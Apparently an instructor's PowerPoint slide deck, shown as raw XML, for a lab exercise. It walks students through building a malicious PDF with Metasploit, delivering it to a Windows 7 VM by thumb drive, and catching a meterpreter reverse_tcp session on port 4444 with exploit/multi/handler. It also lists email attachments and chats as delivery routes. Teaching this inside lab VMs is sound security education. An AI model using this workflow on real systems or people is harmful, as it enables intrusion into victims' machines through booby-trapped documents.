            <a:ext cx="11111458" cy="50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72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92C836-673C-4DD6-9434-FD631AD31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4" y="1676400"/>
            <a:ext cx="10430164" cy="50191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8E755F-C58F-422B-A558-794E789C55DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530224" y="914400"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 6	Set the payload</a:t>
            </a:r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r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" kern="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1932039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CF294C4-3B19-49EB-B2A5-3382A8A37937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="838200"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 7	Set the IP of the Local Host</a:t>
            </a:r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r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.</a:t>
            </a:r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pPr marL="896938" indent="-896938">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" kern="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2000" kern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1EB686-2BCE-4F4A-BD12-BD82245F8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76400"/>
            <a:ext cx="8902460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EC0742-B9D2-41D6-AE66-EE4641BB6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013" y="2605087"/>
            <a:ext cx="6105525" cy="14954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3D2FF8D-B777-4647-A016-650232A5717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429000" y="2017796"/>
            <a:ext cx="1409700" cy="877805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59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65" y="914400"/>
            <a:ext cx="7251298" cy="3490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114800"/>
            <a:ext cx="10090221" cy="18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59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8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 8	Show the options to see the changes …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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.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endParaRPr lang="en-SG" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arrow: Right 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1611166" y="3835300"/>
            <a:ext cx="381001" cy="4572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699" y="376928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Notice this port is 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Right 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1624908" y="2184350"/>
            <a:ext cx="381000" cy="5334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48E7784-B6DD-44B2-85B2-18763698E0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1611167" y="2646640"/>
            <a:ext cx="381000" cy="5334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D3AFD-ABF9-47E2-855A-9BE9D90B6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620" y="1257300"/>
            <a:ext cx="96869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57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23925"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 9	Type “exploit” or “run” to generate the infected pdf file…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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.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endParaRPr lang="en-SG" sz="200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9DB9C18-82AD-412B-A426-2D432499D44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8835453" y="2658319"/>
            <a:ext cx="689546" cy="4572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CEB40-C89A-439A-9DEF-0A77A5F08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873" y="1924983"/>
            <a:ext cx="7199127" cy="129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73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23925"/>
            <a:ext cx="8153400" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>Step 6	Copy the infected pdf file to the Desktop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r>
              <a:rPr lang="en-SG" sz="2000"/>
              <a:t>	They may differ from your other peer groups as the OS maybe accidentally patched.</a:t>
            </a:r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pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="5681246"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 3 ---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9806C-7FF3-475A-BAEE-D040ED04C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00200"/>
            <a:ext cx="9293412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5EF7E-3C54-48E7-8E40-BEBDF591B59F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507120" y="3728286"/>
            <a:ext cx="9609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err="1"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t> /home/kali/.msf4/local/newedition.pdf /home/kali/Desktop/.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3817710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362200" y="3048000"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Task 4 – Deliver the Exploit to the Victim’s Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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998196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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="508000" y="1066800"/>
            <a:ext cx="10871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2800" kern="0"/>
              <a:t>Step 1 – There are many ways to achieve this. The basic method is to copy the file into a thumb drive and copy it into the Windows 7 system. Insert a thumb drive into the USB port and click &lt;OK&gt; when the below screen is shown.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="2400" ker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988800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG"/>
              <a:t>Task 4 – Give the exploit to the End-User of Windows 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1EA408-DB9E-4A65-8873-7497428DA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895600"/>
            <a:ext cx="51625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69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066800"/>
            <a:ext cx="152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If you are using the player, you will find the setting for removable drive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83DAE5-61B9-4A78-BF5C-0AFC759E9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19200"/>
            <a:ext cx="87153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70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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="914400"/>
            <a:ext cx="29718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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0"/>
              <a:t>Step 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Drag and drop the malicious file generated into the thumb drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-SG" sz="2000" kern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DF2D9F-C8AD-438B-AA66-5E4E640E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425" y="910652"/>
            <a:ext cx="62007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26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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1027236" y="990600"/>
            <a:ext cx="29718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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0"/>
              <a:t>Step 3 – Click to disconnect from Kali Linux VM and connect the base OS.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6170E31-C819-4586-8E25-974C212BD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5200" y="2819400"/>
            <a:ext cx="83820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28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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1027236" y="990600"/>
            <a:ext cx="29718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9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0"/>
              <a:t>Step 4 – Resume Windows 7 VM and OS will detect the present of the thumb drive. Click &lt;OK&gt; to proceed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="2400" kern="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0"/>
              <a:t>You may need to suspend Kali if you face problem at this step.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D5C971-4992-4F59-85C8-012BDFD7F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752600"/>
            <a:ext cx="51054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86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1219200"/>
            <a:ext cx="2667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kern="0"/>
              <a:t>Step 5 – Use the same approach you learnt earlier to connect the thumb drive to Windows 7 VM if need to…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EDF5BA-E04D-4BC6-8AE4-30856565A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52600"/>
            <a:ext cx="84201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77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2800"/>
              <a:t>Other ways of transferring the malicious file to the target machine:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Use of thumb drive;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Use of chats;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Sent to user via email as attachment;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Upload to shared drive;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="2400"/>
              <a:t>Upload to team type of application;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-SG" sz="240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3540161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838200"/>
            <a:ext cx="487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kern="0"/>
              <a:t>Step 6 – Open the thumb drive and drag and drop the file “newedition.pdf” to Desktop of Windows 7 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863932" y="5801977"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 4 ---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AD3D38-11B8-4634-8EFF-CEF9C9EC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277477"/>
            <a:ext cx="3295650" cy="55245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7328068" y="2773027"/>
            <a:ext cx="2514600" cy="533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42491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301350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SG" sz="3200"/>
              <a:t>Task 5 – Start the Server to Listen for Connection &amp; Exploit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539192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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="914399"/>
            <a:ext cx="98298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2400" kern="0"/>
              <a:t>Step 1 – Resume the Kali Linux VM. Check the network setting for both VM and see that they are all using NAT configuration. You can check their IP to ensure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" ker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988800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="3200"/>
              <a:t>Task 5 – Start the Server to Listen for Connection &amp; Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2255616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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="914399"/>
            <a:ext cx="29718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2400" kern="0"/>
              <a:t>Step 2 – On the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0"/>
              <a:t> terminal, type “exit” to exit and type “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2400" kern="0"/>
              <a:t>” to re-start Metasploit (if you wish to).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457188" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SG" sz="2000" ker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371600"/>
            <a:ext cx="61150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42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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="914399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2400" kern="0"/>
              <a:t>Step 3 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Type “use exploit/multi/handler”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>             Type “set payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>/reverse_tcp”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	Type  “set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> &lt;IP Address&gt;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	Type “set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> 4444”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>             </a:t>
            </a:r>
            <a:endParaRPr lang="en-SG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3505199"/>
            <a:ext cx="6505575" cy="15430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 bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6934200" y="4648200"/>
            <a:ext cx="533400" cy="762000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00800" y="5486400"/>
            <a:ext cx="4730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port suppose to be 4444</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29127880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 txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="914399"/>
            <a:ext cx="29718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SG" sz="2400" kern="0"/>
              <a:t>Step 4 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Type “exploit” and wait for connection.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="2000" ker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057400"/>
            <a:ext cx="6418729" cy="121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7F1A2D-E72E-47DF-832A-1836A3F5442F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863932" y="5801977"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 5 ---</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1909918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09800" y="2362200"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-SG" sz="3600"/>
              <a:t>Task 6 -  Open the Infected pdf file in Windows 7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18686276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905000" y="914400"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 1 – Return to the Windows 7 VM Desktop … and open the Infected pdf file.</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" kern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D4341-944D-4060-833D-098566B1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452562"/>
            <a:ext cx="53244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341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905000" y="914400"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 2 – A window pop up and request you to specify the file to save the contents to … you may just save the template…</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" kern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761D20-505E-46E5-922B-8EFA5451F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1800225"/>
            <a:ext cx="7372350" cy="4143375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C623790D-666B-48BC-ABFB-261B287965BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7728783" y="3847316"/>
            <a:ext cx="807546" cy="734992"/>
          </a:xfrm>
          <a:prstGeom prst="lef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5117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905000" y="914400"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 3 – Or select the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>non-infected original pdf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>file … and select save …</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000"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49DB5-196E-435B-AFD5-CD380F2B9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1785235"/>
            <a:ext cx="7372350" cy="4143375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214BC706-57DD-4D39-8A13-13C0721E81AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8223119" y="5077207"/>
            <a:ext cx="807546" cy="734992"/>
          </a:xfrm>
          <a:prstGeom prst="lef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80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066800"/>
            <a:ext cx="1905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If you are using the thumb drive to copy files, you will find the setting for removable drive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83DAE5-61B9-4A78-BF5C-0AFC759E9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19200"/>
            <a:ext cx="87153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81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905000" y="914400"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 4 – Click [Yes] to replace the file …</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" ker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981200"/>
            <a:ext cx="5629732" cy="24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263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905000" y="914400"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 5 – Check off the box and Click [Open] …</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" ker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413" y="1690688"/>
            <a:ext cx="6353175" cy="3476625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505CF780-8C2B-4423-A0D1-28667F5ABC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6800397" y="4293423"/>
            <a:ext cx="807546" cy="734992"/>
          </a:xfrm>
          <a:prstGeom prst="lef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5332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905000" y="914400"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 6 – The file is open …and there appeared to be pretty normal … at time you do not get to see  document !</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" ker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676400"/>
            <a:ext cx="5715000" cy="39350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53000" y="5791200"/>
            <a:ext cx="2464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b="1"/>
              <a:t>--- End of Task 6 ---</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18743661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09800" y="2362200"/>
            <a:ext cx="7772400" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-SG" sz="4000"/>
              <a:t>Task 7 – Complete the Penetration in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="4000" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5497224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838200"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 1 – Return to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t> in Kali Linux VM … notice that an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t> session has been created … </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" err="1"/>
              <a:t>wolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>!</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000"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C1441-9A5F-458B-A938-6B6C5F951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807564"/>
            <a:ext cx="95345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38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294F4-9845-4251-8992-2CD7C76D488F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="990600"/>
            <a:ext cx="792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Note: If you do not get to see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1600"/>
              <a:t> prompt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="1600"/>
              <a:t>type “help” or “shell”...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-SG" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SG" sz="1600"/>
              <a:t>If still can’t see, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>check that both the network setting of VMs are set to NAT. Check the Windows 7’s firewall and defender (anti-malware) are off.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Still do not work, check with your peers or tutor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1088575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09600" y="838200"/>
            <a:ext cx="11073596" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>Step 2 – To make sure you have penetrated into the Windows OS … use “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" err="1"/>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0"/>
              <a:t>” command…</a:t>
            </a:r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endParaRPr lang="en-SG" sz="2000" kern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440BF-B41F-4305-9250-94588A51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76400"/>
            <a:ext cx="6966303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288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14362" y="838200"/>
            <a:ext cx="8153400" cy="5181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uFillTx/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uFillTx/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uFillTx/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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="896938" indent="-896938">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SG" sz="2000" kern="0" dirty="0"/>
              <a:t>Step 3 – find out the current user ID.</a:t>
